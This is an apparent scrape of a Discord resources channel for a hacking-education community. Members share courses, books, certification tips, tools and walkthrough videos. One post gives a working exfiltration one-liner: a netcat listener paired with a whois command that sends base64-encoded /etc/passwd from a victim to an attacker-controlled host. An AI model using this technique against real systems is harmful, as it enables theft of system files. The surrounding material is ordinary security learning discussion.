#resources
1 messages · Page 8 of 1
Seems like a flex but why would you come to a learning platform if you’re bored of a Competitive platform
To beat szy
I have taken this one, it's decent for complete beginners . It's avaiable on youtube as well if you don't want to give your credit card to coursera, but you don't get a certificate (ofc) that way
Should I get this???
It's just a class. The classes should be from iCollege. Which it isn't awful. The course I was doing was entertaining at the least and kinda felt like a typical college lecture that I know of, but I think they fluff the entertainment a bit too much. I haven't delved too far into it. I think it's worth it if you're supplementing your info because it's relatively cheap.
Like for college, being able to do S+ videos on that site and supplement with whatever my professor is saying is cool. Multiple perspectives on the same thing.
We've also been given a 30% discount code on
@nostarch
books! Head over to their website and use the code "BSHTX30" during checkout!
(until 17th of September)
Ciphey - Automatically crack, decode, and decrypt ciphertext without knowing the key or method of encryption used.
Supports 34 methods including XOR-crypt, caesar cipher, most base decodings and more.
Since the last time I have posted, we have added:
+ XOR
+ Repeating-key XOR
+ Base62
+ Base91
+ Base69 (nice)
+ Base58
+ Base58 (ripple)
+ AtBash
+ Standard Galatic (Minecraft enchanting table)
+ Binary Substiutuion cipher
``` and we're adding even more 😄 (full list here <https://github.com/Ciphey/Ciphey/wiki/Supported-Ciphers>)
PS: We're **very** easy to contribute to. Just DM me if you want to contribute something ✨
https://github.com/Ciphey/Ciphey
old but it's good
^^ Resource is free before anyone tells me to check it oue 👀
Hello I am Blob! I published my blog post about how to go about making a Vulnerable (linux) machine, for those of you who are interested in that type of thing. Feel free to check it out here:
https://bobloblaw321.wixsite.com/website/post/the-making-of-a-vulnerable-machine-blob-blog
(I'd love feedback for if there are more services you'd like to see how to set up if you guys enjoy that post!)
I watched the first half before I fell asleep last night. I think it's very informational, at least the portion about why certain programming languages have become as popular as they have.
Richard is a member of the Elm core team, the author of Elm in Action from Manning Publications, and the instructor for the Intro to Elm and Advanced Elm courses on Frontend Masters. He's been writing Elm since 2014, and is the maintainer of several open-source Elm packages in...
1Like=1❤
10like=10❤
1Subscribe=100❤
Kindly Share And Let Others Know About Us.
Toppo: A beginner friendly VM to start with.
Link related to the video.
[] Toppo VM Direct Download Link
/ https://bit.ly/336uM0E
[] PrivEsc Suite Link (use git clone 'link')
/ https://github.c...
Have limited ways to exfiltrate data? Use Whois!
attacker: nc -l -v -p 53 | sed "s/ //g" | base64 -d
victim: whois -h $attackerIP -p 53 cat /etc/passwd | base64
617
1701
Nice one @shut ferry
thanki
I didn't think that it was possible to hack neural networks
I didn't think that it was possible to hack neural networks
Thanks for this, something nice to read during lunch for the week 🙂
is it possible to use a neural net for the defense?
Resource Request: One of my classes is basically part of CompTIA's Security+. We are given access to the book CompTIA Security+ SY0-501 Cert Guide, Academic Ed (2e). The book seems okay, so far, but it seems like we're not getting too many lectures and are being expected to just kinda read the material and figure it out. The book is from 2017 and given the nature of InfoSec, I suspect some things might end up not being correct for 2020 standards, possibly 2021 when I take my exam. THM, as a general resource, has helped me prep a lot for the first few chapters, but considering this monster of a book has 18 chapters, I do have some concerns. Eventually, I'd like to turn this class into getting my own Sys+ certif and eventually OSCP.
For anyone who has done Sec+, do you all have any recommended resources that can help me succeed? Are there any pitfalls that caught you? I'd love to hear some input.
@daring hull I just took my security plus three weeks ago. It was not bad at all the first 4 questions are all practical and I recommend you skip them and move on to the 75 multiple choice. Some of the questions are multiple answers and they do give partial credit. The only study tool that I used was a book that I bought online which is : Security+ Get Certified Get Ahead. That book I read it and studied the definitions really well and did well on the exam. If you have some prior experience in Cyber Security then some of the concepts is just repetitive other things will be new
That makes me feel better, especially having a jumpstart in InfoSec with a good community. I just started on my path officially this year, so while I still have a lot to learn, I definitely know that I know more than I did. I usually see a lot of people parrot that Sec+ was really difficult and a lot of people flunk the first time. I'll check out the guide you mentioned.
https://github.com/justinsteven/dostackbufferoverflowgood just popped a shell on this 😎 , good practice
The other day I talked about Dark Reader. I think some folks are unaware you can blacklist certain websites from Dark Reader so that you can use the dark mode that the website provides.
Dark Reader can be found here and is available on pretty much all of the major browsers: https://darkreader.org/
If you want to blacklist websites, head over to the tab labeled site list and click on not invert listed, then add the domains you don't want Dark Reader to... darkinize. If you're a uni student and are having to use e-books, Dark Reader is really awesome because it gives you a dark black background with light grey text and it makes reading a lot easier.
+10 this it's saved my life since
-5 the above sentence needs some inglish inprovements @sturdy shell
(that is done on purpose btw)
Nightmare: an intro to binary exploitation / reverse engineering course based around CTF challenges.
That's not even accepted on the writeups on rootme
And please only post it of it's approved
@lone crane please don't post writeups unless they're approved by the room creator. Writeups that are approved go in #thm-community-media.
ok
It's free for today if you wanna enroll
Great catch, Quantum
Please don't share referall links @digital crag
sorry
You can share that the course/offer exists, but yeah, no refereals pls :3
thanks for the warning
Updated my list, slightly less scuffed now. Hope it helps someone out there whos learning RE/bin exp
https://github.com/0xroman1/Scuffed_Low_Level_Stash
Windows resources looks good, defo gonna give some of them a read (: thanks!
Sure thing 😄
Out of curiosity how deep into windows exploitation are you trying to get @sturdy shell?
I could DM you some notes ive been taking in school depending on what you're studying
Ah, not so much windows exp specifically. I specialised in malware analysis in my degree so anything Windows RE I eat up (:
Not trying to get any 0days or write dll injections hehe 😅
ooohhhhh then you'd love this @sturdy shell
https://github.com/Perfectdotexe/Perfect-Malware-Samples
Have you used flarevm at all? Ive heard some pretty good things about it
that's a pretty cool repo aye, I'm on VirusShare + a few other closed circles for that sorta stufff
FlareVM is great!
I really want to get more into the RE side of things, ive really only been focusing on pure binary exploitation stuff (RE is a part of it I know) but would you have any recommendations on things I could use to work on?
I will need to write a thesis paper at some point in time
and id like to do it on malware RE
Really good if you want a quick lab environment, making your own is a lot more riskier and tedious but is a lot better in the long run
For Windows Malware RE? I can dig some out for sure
yeah I just picked up an old thinkpad x220 from a craiglist guy that im planning on using for an isolated lab
I have a couple of beginner friendly Malware RE rooms on THM already
Granted you're analysing software that I had to make that pretends to be malware
but the next one is doing all the forensics of Ceber and Wannacry but it's chunky
I'll dig out some good stuff bare with me 👍
oh word? ill have to check that out. Right now im just trying to develop more skills, so it dosent have to be real malware. As long as im able to develop that process then all good
thanks!
Accepted your FR (:
❤️
Yeah it goes through all the practical techniques (: my dissertation was on malware detection via ML so I'm keen to hear about yours ^^
Well its going to be a paper im going to be submitting for this scholarship/program. Its not "graded" but its supposed to be a technical paper displaying knowledge as to why id be suitable for the program. I can do anything I want for it, no set topic
Ah I gotcha, pretty neat to have that freedom
I'll shoot over some stuff when I get the chance later today (:
thankie :))
RE/PWN for life.
Learn about what certifications to take! Audio issues are fixed in this video, I promise :)
Follow me on Twitter: https://twitter.com/darkstar7471
Join my community discord server: https://discord.gg/NS9UShn
Slides: https://docs.google.com/presentation/d/1bStE82PszNKPm4jtdQq...
Super super soon
awesome
Hey , have a quick question
I’m pretty new to reverse engineering, I have a very basic knowledge of x86 and wonder if there is any methodology / course to improve skills ? ( other than x86 courses )
lol james just told him to ask here
I really liked Shellcoder's handbook
@fringe spire A request for resources kinda fits here, don't you think?
lol james just told him to ask here
@cloud brook uhmm..... Hides
The Shellcoder’s Handbook it's not really an x86 book but I've found it super interesting with bof etc
https://pwncat.readthedocs.io/en/latest/ -- For pwncat written by John Hammond and his friend Caleb
His friend's name is Caleb, very talented coder 🙂
Yea had to go back in the video to find his name haha, Thanks
@azure drift Check the pinned messages, there are some resources.
👀
Microsoft are doing $15 certs for those unemployed during COVID https://docs.microsoft.com/en-us/learn/certifications/skillingoffer
That's really cool of Microsoft to do
Dropping this in resources too:
https://pauljerimy.com/security-certification-roadmap/ for people that want to build their own certification path. It's an interactive map that also takes you to the payment screen and provides some short details about the cert itself (pricing too)
@honest dock mind pinning this for other people to see it too?
ty
np
Dark also references that chart in his new video
Not sure if this is the section. But, can anyone recommend an app for droid to get infosec news etc. I tried setting up alerts via google but 1) nothing comes thru 2) i dont want my email to be filled with notifications. Looking for like an alert feed type of an app, if it even exists.
Thank you for the suggestion. I also set google to notify via rss but nothing ever comes thru.
Follow me on Twitter: https://twitter.com/darkstar7471
Join my community discord server: https://discord.gg/NS9UShn
TryHackMe Room: https://tryhackme.com/room/rpmetasploit
Slides: https://docs.google.com/presentation/d/1SBBN4Gs0iLW39NgO197ep0gGSxTp9hEgrd3-NE5OlYI/edit?usp=sh...
#request Resuources on sql injection pls 😕 (not cheatsheets or rooms), not anything too beginner friendly 🙂 I can't find anything that isn't too beginner friendly or too easy, I have done that kind of injection, some advance onces are just too small to learn anything
Check the “resources” Task in my sql injection room
it has plenty of challenges/blogs/guides/lists
Red Siege is an information security company focusing on real world threats. Red Siege is an information security consulting company that concentrates on the latest threats to organizations today. We perform in-depth analysis, determine organization/business risk, and find the...
Check the “resources” Task in my sql injection room
@honest dock Isn't that sub only ? I don't have a sub currently
Not so easy for me. I literally have to beg a friend of mine to get me a voucher since my bank declines any transaction with THM automatically
I almost forgot about web academy
I'd also personally recommend learning some webdev so you can add some context to your sqli and sql knowledge
I am learning php and js
What do you want to learn? Database security?
Getting a holistic picture with all your context has been super helpful for me
I just want to get good at owasp top 10
I thought I will start with injetions, sql in particular
I would start with learning how a database works, how queries work using SQL, how a database interacts with web services, etc..
Foundational level of understanding what is being attacked.
Yes I watched a vid on mysql
MySQL tutorial for beginners - Learn MySQL, the world's most popular open source database.
🔥Get the full MySQL course: http://bit.ly/2uAoPM3
👍Subscribe for more SQL tutorials like this: https://goo.gl/6PYaGF
⭐️Want to learn more from me? Check out these links:
Courses: http...
Set up a mysql database and populate it with tables, etc..
That's what I thought, to better understand sqli, I need to learn sql first. so that step is clear 😁
You are probably running into the issue that most videos / tutorials online are introductory in nature. They only scratch the surface of topics discussed.
Which gets frustrating. 😄
Hey! My friend made an interactive editor for binary exploitation 🙂 🥳 Friend: @analog shoal. @white pivot you might like this 😛 https://smashing.c3murk.dev
Nice one @analog shoal
You are probably running into the issue that most videos / tutorials online are introductory in nature. They only scratch the surface of topics discussed.
@craggy onyx Exactly
Does anyone have a version of incognito2 already compiled in exe
They already have an exe on github
Nothing much, just my notes from Web Security Academy's SQL Injection section https://www.notion.so/SQLi-c3dc193fef9b49818ced8bf622096c5d
Nothing much, just my notes from Web Security Academy's SQL Injection section https://www.notion.so/SQLi-c3dc193fef9b49818ced8bf622096c5d
@queen wyvern Thanks man!
@queen wyvern not anymore. i finded a another link https://github.com/milkdevil/incognito2
Practical Ethical Hacking, Windows and Linux PrivEsc on sale, again
Follow me on Twitter: https://twitter.com/darkstar7471
Join my community discord server: https://discord.gg/NS9UShn
TryHackMe Official Discord: https://discord.gg/tryhackme
TryHackMe Room: https://tryhackme.com/room/source
Image credit to Ekaterina on Dribbble: https://dribbb...
https://twitter.com/thecybermentor/status/1305933865597497344
@daring hull Are this cources goes for free any time?
@daring hull Are this cources goes for free any time?
@glad hazel You would have to watch his Twitter. He sometimes drops free codes (as seen in the original tweet) but the courses go on sale often and I'd say it's worth giving the guy money for making good courses
I have updated my ezpzBOF v2.0 🙂 Can try use this on any bufferoverflow room in TryHackMe hehe
https://twitter.com/thecybermentor/status/1305933865597497344
@daring hull Um, isn't there a free resources rule ? I get this one is good and TCM is a contributor to something , but this link gets posted here a lot, like every few weaks when this is on sale
self promotion of paid content, so unless you get someone else to promote the paid content, it's fine ?
It's a well regarded, widely accepted high quality course. Sundae does not profit from it. Sundae is sharing a discount code.
Sundae is fine.
Please leave the enforcement of rules to the moderators.
I'm not encfocring any rules, nor picking on sundae. Just trying the understand the rules better
Your message seemed very much like a complaint.
Do not self promote here. If it's something you made (and will make money from) or something you make money from (eg referals or made by a friend who is sharing profits), don't use this channel to advertise or promote it.
Hey guys, buy throwback 
It was a question, sorry if it felt like something else. I have never and won't promote anything mine, or someone else's of course. Have a nice day 🙂
Follow me on Twitter: https://twitter.com/darkstar7471
Join my community discord server: https://discord.gg/NS9UShn
Task Timestamps:
Task 1: I'm attacking what now? - https://youtu.be/_BlqBx_iSzQ?t=17
Task 2: Discovering the Lay of the Land - https://youtu.be/_BlqBx_iSzQ?t=6...

Dark is on write-ups spree.
Wanna Learn The Basics of metasploit this is the right video for you guys ! https://youtu.be/fQipR_I_QXM
Hey Guys , In Today's Video I'll Be Talking about the Basics of Metasploit , I Will be Doing a Live Attack Demo in The Video, If You Have Any Question Make Sure to Ask Down Below.
Metasploit : https://tryhackme.com/room/rpmetasploit
Blue: https://tryhackme.com/room/blue
⭐ Di...
https://github.com/sindresorhus/awesome there may be a goldmine of stuff here
Hey everyone i made this resource for hacking kind of to act like a cheat sheet and stuff and now i transferred it over to a subdomain any kind of suggestions or comments would be very much appreciated as i am trying to improve it and then later on make it public and open source notes in a way
TryHackMe has a subreddit! We are slowly ramping up the subreddit (see the subreddit mod roles on some of us 😉 ).
Come check us out if you're into Reddit 🥳 https://www.reddit.com/r/tryhackme

oh hi forum staff Ma1ware
As part of the forum staff, I have to advertise the forums as well, there will be lots of changes soon, check us out here:
https://tryhackme.com/forum/
😉
Fix Forum 
🤫 It's not broken! 
Everytime you change Sorting it shows different results
🤫 Let me advertise lure people into the forums!
LMAOOO
Stumbled upon this website/blog about a week ago after completing James' Crypto 101 room. The blog has very nice essays on HTTPS and Public Key Infrastructure as well as refreshing & fun to read posts on games, encryption, web security etc.
https://robertheaton.com/
👀 Backlinks are finally here!!
Now whenever you make a link to another page, a backlink is created automagically, so you can see the connections between your thoughts & pages.
And there's lots of new shortcuts to [[link]] and +create pages as you type. https://t.co/npnvtmsU...
171
1673
its been like that for a couple weeks im p sure
weird they are just tweeting about it
when they going to add wide pages as a default option?
I haven't watched this but thought this might be of interest to some https://www.freecodecamp.org/news/free-computer-networking-course/
nice, i plan on taking N+ next month
You're on cert spree or something? @gritty barn
I'm on vouchers are about to expire spree @white pivot
Wish I could be that lucky
Follow me on Twitter: https://twitter.com/darkstar7471
Join my community discord server: https://discord.gg/NS9UShn
Task Timestamps:
00:00 - Video Overview
00:40 - Task 1: Introduction
02:16 - Task 2: Example Research Question
12:58 - Task 3: Vulnerability Searching
21:00 - T...
Spyse is a cybersecurity search engine built for quick analysis of IT infrastructures, networks, and even the smallest parts of the internet.
great passive OSINT search engine
https://github.com/nccgroup/GTFOBLookup https://github.com/denisidoro/navi https://github.com/mthbernardes/rsg
Offline command line lookup utility for GTFOBins (https://github.com/GTFOBins/GTFOBins.github.io) and LOLBAS (https://github.com/LOLBAS-Project/LOLBAS) - nccgroup/GTFOBLookup
An interactive cheatsheet tool for the command-line and application launchers - denisidoro/navi
good tools
Navi's nice, I've used it before
Thanks! I use this as well
Here's a 15 hour one also: https://youtu.be/3Kq1MIfTWCE?list=WL
Learn network penetration testing / ethical hacking in this full tutorial course for beginners. This course teaches everything you need to know to get started with ethical hacking and penetration testing. You will learn the practical skills necessary to work in the field. Thro...
Does anyone know any book / website to practice network diagrams?
@shrewd ginkgo where can i get scenario questions based on which i have to draw a diagram?
Now that I don't know
@fossil gorge I mean it depends on what you’re talking about if you just want a static picture then pretty much any flow chart creator will do. If you want something with more functionality then something like packet tracer which is a network diagram simulator or GNS3 which is a network diagram emulator, can help you
I personally really like GNS3 because it has so many options for packages however it can also be harder to setup
@azure widget I was hoping to find something that will describe a network and then require me to draw its diagram
- Two networks A1) B1)
- Each network requires a border router
- Each network needs a firewall blocking inbound traffic
- A1 has four network subnets A) R&D B)Customer Support C) IT D) Data Center
- B1 has three subnets A) HR & Legal B) Users C) Business Apps
- Both sites are connected via a VPN
.....
Something like this that I could put up using drawio
Follow me on Twitter: https://twitter.com/darkstar7471
Join my community discord server: https://discord.gg/NS9UShn
Task Timestamps:
00:00 - Video Overview
01:13 - Nmap
02:10 - Examining the Website
04:37 - Gobuster
07:10 - Hydra
12:38 - PHP Reverse Shell
16:47 - John the Rip...
Hi, I am looking for a good OS course
If anyone has some online courses on the bookmarks, I would appreciate if you shared them
❤️
I have this in mind:
https://learn.saylor.org/course/view.php?id=94
Follow me on Twitter: https://twitter.com/darkstar7471
Join my community discord server: https://discord.gg/NS9UShn
Task Timestamps:
00:00 - Video Overview
00:45 - Nmap
02:02 - Examining the Website
02:47 - Vulnerability Research
04:42 - Remote Code Execution
07:35 - Privileg...
Are you allowed by admins to post that here?

Umm, that actually is not allowed
Looks to me like it is?
This is a writeup of some sort that makes answer to RedTiger's Hackit Public, when the owner of the challenge has mentioned that they shoudn't be made public
Hey guys, what would be a good resource to learn reverse engineering?
I already know a good amount of c++/assembly and have already done some easy crack mes, so I am not a complete beginner.
This site is pretty nice and has been linked here a couple of times https://guyinatuxedo.github.io/
For reverse engineering @nova pond
Thanks. Will take a look at it when I am home.
If anyone else has other suggestions just tag me 🙂
Hi guys. I'm new here.. Can I get any resources for learning bash scripting please?
Have you tried Google?
yeah.. but there are many and i'm confused
okay bro. I'll try that.. Thank you
I just published How to install Ubuntu with GUI on Digital Ocean for free ? https://link.medium.com/KGsjA5KkZ9
Can you guys recommend me a book or any resource on how to make your own CTF ?
Can you guys recommend me a book or any resource on how to make your own CTF ?
@jaunty raven https://discordapp.com/channels/521382216299839518/554713196804440101/752284794993246238
@jaunty raven I have slides from a presentation I did on it on my blog (https://muir.land/content). Dark also has a blog post on it on the TryHackMe Blog: Making the Mountain
Also lowkey going to plug this from TryHackCIT
granted 99% of the content to go with it is missing, the URL's at the end are useful if you're looking to create some stuff for THM specifically (but the stipulations are pretty sensible for any CTF)
ugly url / risky click of the day inc
http://resources.cmnatic.co.uk/Presentations/THM Room Dev 101.pdf
help 
A) #announcements
B) How the heck is this a resource? 😆
ok
I just published How to install Ubuntu with GUI on Digital Ocean for free ? https://link.medium.com/KGsjA5KkZ9
@solemn bough Is there any way I can get the same t results with AWS?
Yes mate @glad hazel you could Just follow the same process I used digital ocean as they provide credits instead of free tier you could use free tier too but the speed is comparitively slow
You mean the response will be too slow to work with
?
I mean kali is not going to hold on free tier specs. I guess
@glad hazel if you want a proper hosted solution for Kali. Check out the TryHackMe subscription. It's $10 a month and you get a AWS hosted Kali or THM AttackBox. The only thing you won't have with it, is Persistence. Once it terminates its reset back to factory. But it's a good solution if you haven't got good hardware to run a VM.
Plus you get the other features of a subscription. https://tryhackme.com/why-subscribe
can i get some resources for creating rooms based on owsap top 10
amazing content
https://github.com/carlospolop/legion
Follow me on Twitter: https://twitter.com/darkstar7471
Join my community discord server: https://discord.gg/NS9UShn
want to know how to do automation script writing
Hey guys im trying to learn Python code so does anyone know a course or a place that teaches me
I only know Print("")
lol
Sololearn
is that the website or something?
The best place to learn is solo learn in my opinion but just typing in “Python Basics” or “How to code python” into google has many YouTube tutorials and websites dedicated to teaching you Python :)
My face resource is "automate the boring stuff"
@steady crater https://www.youtube.com/watch?v=HBxCHonP6Ro
Website - https://thenewboston.com/
GitHub - https://github.com/thenewboston-developers
Reddit - https://www.reddit.com/r/thenewboston/
Twitter - https://twitter.com/bucky_roberts
Facebook - https://www.facebook.com/TheNewBoston-464114846956315/
LinkedIn - https://www.linkedin...
Shame he doesn’t do it anymore
Yeah he has some great tutorials on his channel
Hacktoberfest is now open https://hacktoberfest.digitalocean.com
This Person Does Not Exist
Very cool
Found this really interesting. https://www.quora.com/Would-it-be-possible-for-a-virus-to-escape-a-VM
I'm really glad I found out about it
Because it's typically significant if you can escape the VM
I'm going to google it a bit more, hopefully find a poc
I'm going to start separating my network...
If you can escape from a sandboxed VM be it Hyper-V/VMware you're showering in money and job prospects
who's familliar with this channel?
https://www.youtube.com/c/webpwnized/playlists
Hypervisors can be exploited, but unsure if you can break out of the VM via the guest OS
Thats better, now I have a name ha
what's the difference between a cloud base vm and vps?
P->Private - host resources not shared with other vms
A VPS can be a cloud (IaaS) service...its justs dedicated
I Explained These Thanks to tryhackme for providing the room https://www.youtube.com/watch?v=Dd4Rh4_Rtng
Hey Guys , In This Video You Will Understand the Concepts of SMTP , NFS , MySql Protocols , and how they work. I Will Also Be Linking Some Good Resources to have a look at.
NFS Resources:
https://docs.oracle.com/cd/E19683-01/816-4882/6mb2ipq7l/index.html
https://www.datto.co...
Hypervisors can be exploited, but unsure if you can break out of the VM via the guest OS
@inner pewter Yes. You can. It's a severe vuln
Follow me on Twitter: https://twitter.com/darkstar7471
Join my community discord server: https://discord.gg/NS9UShn
Task Timestamps:
0:00:00 - Video Overview
0:00:36 - Task 1: Intro
0:01:22 - Task 2: Methodology
0:01:52 - Task 3: [Section 1: SSH] - Intro
0:04:07 - Task 4: [Se...
This is what nightmares are made of
oh god 1.5h of darkstar
also not sure if it's just me but the timestamps aren't showing D:
Instead of ocean waves to go to bed now you can listen to dark star
😄
Timestamps are down below
I'm not sure why YouTube isn't showing them on the video, they were working yesterday when I tested it
1.5 hour to understand shiba1
oof
Red Team and Adversary Emulation
Penetration Testing
Web Application Penetration Testing
Mobile App Assessment
Remote Access Assessment
Purple Team
Let our Offense prepare you with the strongest Defense.
contact@redsiege.com
___________________________________________________...
some of the best guys in the industry if you don’t already follow their work I highly suggest you do
Pwning Binaries with one goal to be best
@spiral zodiac 👀 ^
Ooh, very nice! Good job on that writeup @white pivot
dark, i still cant SSH into shiba1
@cloud brook are you using correct password?
🤦
Ooh, very nice! Good job on that writeup @white pivot
@spiral zodiac Assuming JB's tag, you guys were looking for something like that :p
are you using correct password?
not psswd problem man
@cloud brook are you using correct password?
@thorn rock I think so... it doesn’t work 😦
lmao
inb4 Bob is trying ssh shiba1@localhost with his own password 😁
(Yes. That has happened, and yes, the person posted their own password in community-help)

(Yes. That has happened, and yes, the person posted their own password in community-help)
Damn
Blame Pars, bad instructions
Oh, I frequently do 😁
hahaha
https://dfirmadness.com/the-stolen-szechuan-sauce/
^ dfir challenge
Oooh that looks good
Good courses on: Networking (Especially for cybersecurity), Server Administration (Windows AD DC, ...), LPI?
I aim to study the basics before moving on to specific fields like PT and Red Teaming...
Can someone recommend a book of some sort on pentesting/kali. Something that possibly teaches tools and shows methods
Its confusing, as there is a lot to choose from. Looking for something that mirrors OSCP study material
@magic idol beginner level?
@keen field yes, preferrably.
@magic idol ETHICAL HACKING
AND PENETRATION
TESTING GUIDE
RAFAY BALOCH
Thank you. I will look that up on amazon :)
very beginner friendly
Classic matrix wallpaper haha
Before I decide to purchase Ill wait for a few more suggestions/opinions
Thank you tho. It is now added to my list of possibilities@keen field
although her new book is coming out 'soon', this is a classic https://nostarch.com/pentesting (Penetration testing by Georgia Weidman)
Penetration testers simulate cyber attacks to find security weaknesses in networks, operating systems, and applications. Information security experts worldwide use penetration techniques to evaluate enterprise defenses. In Penetration Testing, security expert, researcher, and ...
Cool. Thank you.
Follow me on Twitter: https://twitter.com/darkstar7471
Join my community discord server: https://discord.gg/NS9UShn
Task Timestamps:
00:00 - Video Overview
00:24 - Task 1: Introduction
01:25 - Task 2: What is Digital Forensics and How is it Used Today?
07:54 - Task 3: Problem...
how can i hack on a Macbook Pro
You can use a VM, or you can install tools on macos
(I'd really only do that if you have a spare macbook or such... but that is just me)
I'm also not sure about the legality 
Yeah that sounds pretty sketchy to me seeing as it violates the license terms @rough trellis
I'm deleting it
how can i hack on a Macbook Pro
@dire linden i use virtualbox and kali you can dowload virtualbox here -> https://www.virtualbox.org/ and a kali .iso file here -> https://www.kali.org/downloads/
kali comes with hydra and nmap
cool
Guys i can't deploy the room. Is there a page to view all the deployed rooms at once?
Check tech support. Termy tagged you @willow crag
@cloud brook
That’s what you get when running szys snippet?
Yeah Giving errors but one of my VM i think got expired. So it's good for now.
Maybe THM should create a separate page for checking and monitoring VM's..
or just turn off the VMs as you leave the room
😄 Yeah
the script worked, this is the output it sends, i just tested here
https://github.com/0x0ff3ns1v3/extension-wordlists
Made some wordlists for some common extensions for languages such as php
I am working on writeups for different rooms I have been working on, but I want to know the best way to post them - i.e. blog, github, etc. Any ideas would be helpful
blog preferabl
you can host a free blog on github pages using jekyll
or you can use 11ty or hugo or gatsby + netflify
LGBee thanks, I will take a look at them
https://go.rangeforce.com/community-edition-registration
Free training for Splunk, Suricata, Docker, Kurbenetes and more
Try out 20 cybersecurity training modules for free with our community edition.
hi, does any one have a good resource about buffer overlfow?
thanks, i give it a look. yes the THM rooms i have found. i need only some thing to read about this first. 🙂
This is fairly technical but it's a great resource
https://github.com/Battelle/movfuscator
@spiral zodiac Might put a binex challenge through that for the lols
TCM made this and it's my personal favorite for beginning BoF: https://veteransec.com/2018/09/10/32-bit-windows-buffer-overflows-made-easy/
@night holly There's a tool to deobfuscate it too:
https://github.com/kirschju/demovfuscator

Hey everyone! 👋
It's hacktoberfest time! If you submit 4 pull requests this month (after signing up to Hacktoberfest via https://hacktoberfest.digitalocean.com/) you'll receive free merch (a shirt, stickers and maybe some other things).
Ciphey is now open for Hacktoberfest with a whole range of GitHub issues (and we add more everyday) ✨
https://github.com/Ciphey/Ciphey/issues?q=is%3Aissue+is%3Aopen+label%3Ahacktoberfest
@small night ?
@odd quest It's a referral linnk
an MLM
One link is okay because it's an event, but any more and it's deletion 
tell u what
Hacker Halted 2020 is a FREE and VIRTUAL event this year!
5 days of amazing speakers all online and all for free!
sign up now you get an annual subscription to their premium magazine for free.
https://www.hackerhalted.com/register-for-hacker-halted-2020/
that's better 
Any good ios exploitation book
There is the iOS Hacker's Handbook, but it is quite old from 2012. A more recent publication is iOS Penetration Testing: A Definitive Guide to iOS Security, by Kunal Relan. @rapid vortex
@craggy onyx thanks
The first 1000 people who click the link will get 2 free months of Skillshare Premium: https://skl.sh/nostalgianerd09201... PKWare, PKZIP, PKUNZIP, these are all names which mean something significant to me. For most of the 90s, the PK tools were probably the most frequently u...
hit me with your fav wireshark learning resource
@crimson thunder Well, I think wireshark is fairly intuitive, the documentation for it is amazing. You can find samples to practice with https://wiki.wireshark.org/SampleCaptures I would just practice, it really depends on what you want to do with wireshark and why. I’ll be coming out with a room soon on it so all resources will be in one place.
@azure widget good to know that about the documentation. I'll give it a look. Nothing particular, just need to dive in while preparing for the ejpt
I have no clue what wireshark has relevance in eJPT but 🤷♂️
it has no relevance for eJPT @crimson thunder don't worry about it
it's covered in the course
yeah, not on the exam
oh I don't expect a wireshark exam or anything like that, but just reading the material feels wrong 😛
anyways, I never really properly learnt to use it and generally I try to have more than one resource for everything
thanks for the answers
Learning Wireshark in general is an asset to have, as to having visibility how normal/suspicious traffic looks like on a network. How network packets in general look like.
Enjoy this amazing gift from @CristiVlad25 😍😍 @here Your FREE coupon to learn Python and turn into a highly sought-after #bugbounty hunter or cybersec PRO.
Do him a favor: share the coupon & course 😍
Course link: https://t.co/SOC1D0jbtc
Coupon code: PYTHONSECURITY
👀
I’ve looked at the content it’s nothing crazy but free is free
Hey if you're looking for hacktoberfest issues to work on (not related to my projects) this search query will give you every GitHub issue labelled with it 🙂 https://github.com/search?q=label%3Ahacktoberfest&type=Issues&ref=advsearch&l=&l=
00:00:00 - Privacy
00:01:12 - Deleting Files
00:07:30 - Cookies
00:17:12 - Incognito Mode
00:18:40 - Authentication
00:20:04 - Passwords
00:30:49 - Password Resetting
00:35:49 - Using the Same Password
00:37:15 - Password Managers
00:39:22 - Two-Factor Authentication
00:43:30 ...
**8 Hours Web Application Penetretation Testing **
@queen wyvern 1. the shortened link does not work
2. why did you shorten it? are you hiding a reflink?? 
- It works 👀
- It's udemy, there's no referral
- I shortened it, cause the link was ugly @tribal gull
uhh i think you can remove most of the query params
noice

Yes
Yess !! Thanks
For people wondering how to embed, copy the link and select embed , or create a new embed and paste the link
I’ve never seen so many DFIR resources in one place https://dfirdiva.com/free-training
Way back in April I did the first of our series of "0-day live streams" where we found brand new 0-day vulnerabilities in a piece of software called PDFCrack and exploited one of them. This video is a condensed explanation of the vulnerabilities and the process we used to find...
Follow me on Twitter: https://twitter.com/darkstar7471
Join my community discord server: https://discord.gg/NS9UShn
Task Timestamps:
00:00 - Overview
00:50 - Task 1: Unit 1 - Introduction
02:09 - Task 2: Unit 2 - IPP Port
04:37 - Task 3: Unit 3 - Targeting & Exploitation
16:0...
Note - I was banging my head trying to fix this, thought I'd pass this along to help others.
Issue - The newest version of VirtualBox-6.1.14-140239 for MacOS Catalina has a bug that aborts Linux VMs when it attempts to check audio permissions with CoreAudio, ICH AC97 enabled. I haven't fully tested with SoundBlaster 16 or Intel HD Audio, enabling them doesn't crash the Linux VMs. Windows VMs don't seem to be effected.
Resolution - Disable the audio in the Linux VMs settings. Try using the SoundBlaster 16 or Intel HD Audio if you need audio.
@shut ferry Spamming same question in multiple wrong chats 

Yes my bad
u ok? 
I suggested that they put it here. @queen wyvern u OK hun?
@queen wyvern 1 - My bad, apologies - it wasn't intentional. 2 - Other mods keep telling me to post in other chats. Simply trying to help out.
@shut ferry None of them were mods, and this is the correct chat. 🙂
@spiral zodiac 🤘
I'm not a mod but I knew it would get lost in General and this is a nice safe place for your fix
I already apologized, but in my defense I just saw this whole bunch of a text in 3 chats in under a minute
I'm still learning the lay of the land. I appreciate the help.
need a few sources for concepts regarding embedding something to a file (commonly used within images particularly)
i dont know the name of its process
Steganography
Do you mean Steganography ...
@scenic summit https://0xrick.github.io/lists/stego/
@scenic summit https://tryhackme.com/room/ccstego
@prisma bison Wrote this about GoBuster vs Dirbuster vs Wfuzz vs ffuf , check it out 😄 https://www.reddit.com/r/tryhackme/comments/iwy7uu/favourite_dirbusting_tool/g7ft7eo/?utm_source=share&utm_medium=web2x&context=3
5 votes and 7 comments so far on Reddit
👀
https://leovoel.github.io/embed-visualizer/
I'm working on my THM Competition bot, and szy sent me this. It's pretty cool.
@azure widget @queen wyvern tnx much both of you
https://github.com/NinjaJc01/thm-compete-bot
So I decided to make a discord bot to encourage my housemates to compete for a leaderboard position.
As it's Hacktoberfest, I opensourced it and converted it over to embeds.
It's designed for smaller communities, and gives a daily leaderboard of the users from the config file.
Update: It now adds profile pictures to individual user statistics.
PRs are open for adding features, long as you can justify it
Anyone know some good sources to learn powershell more in depth. Just completed the thm room and enjoyed it so wanna go into powershell in depth now thnks
over the wire
Do u know the specific section its under, if u dont mind me asking?
